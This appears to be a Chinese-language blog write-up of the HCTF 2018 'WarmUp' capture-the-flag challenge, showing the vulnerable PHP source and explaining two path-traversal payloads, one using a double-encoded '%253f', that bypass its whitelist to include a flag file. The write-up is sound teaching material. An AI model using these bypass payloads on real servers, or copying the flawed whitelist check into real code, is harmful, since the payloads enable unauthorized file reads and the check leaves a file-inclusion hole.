[HCTF 2018]WarmUp
查看页面源码,发现有提示
访问source.php,发现后台代码
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
看一下代码应该是文件包含漏洞,主要是绕过emmm类中的checkfile函数
,仔细看一下这个函数,第一个点,调用这个函数的时候参数使用的是引用传递,虽然对解题没什么影响,只是提一下这个知识点。
参数的引用传递就是把实参的内存地址复制一份,然后传递给函数的形参,实参和形参都指向同一个内存地址,因此函数对形参的操作,会影响到函数外的实参。
按引用传递就是将实参的内存地址传递到函数的形参中。因此实参和形参指向的是同一个内存地址。这时在函数内部的所有操作都会影响到函数外实参的值。引用传递的方式就是在值传递的基础上加上一个&符号,如下所示:
function name (&参数1, &参数2, ..., &参数3) {
...
}
看一下这个函数的参数使用这就这种传参方式
继续往下看函数的功能,先设置了一个白名单,如果是白名单里的内容,则返回true,否则继续运行,接下里便是函数mb_substr(),该函数的作用如下:
该函数里面又套了个mb_strpos()函数
函数执行完后,继续判断截取的字符串是否在白名单中,若在,返回true,否则返回false
后面再执行一次url解码,然后和前面的过程一样。
分析完函数后,就要开始想如何绕过,第一种方法是
file=hint.php?/../../../../../ffffllllaaaagggg
当执行第一次截取时,得到hint.php。返回true,然后便可以进行文件包含
,但是我们发现该函数并未对我们传入的值进行任何改变,也就是说include包含的内容是**”hint.php?/…/…/…/…/…/ffffllllaaaagggg“,但是为什么还是能够执行呢,这里是因为操作系统会“hint.php?/”这一部分当作文件夹,在此基础上通过…/回溯到上一级,如果是”hint.php?../…/…/…/…/ffffllllaaaagggg“,注意这里问号后面没有斜杠,直接是点。发现也可以执行成功,原因一样,是因为把”hint.php?../“**当作了文件夹名。如果没有这样命名的文件夹。则会直接寻找后面的相对路径进行读取
注意:如果我linux操作系统这样是可以的,如果是Windows操作系统,便会报错,因为Windows操作系统不允许文件名中出现问号等特殊字符,而linux可以。也可以猜到该题的后台环境应该是linux
第二种方法和第一种类似:
file=source.php%253f../../../../../ffffllllaaaagggg
利用url解码后再截取通过白名单
3047
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
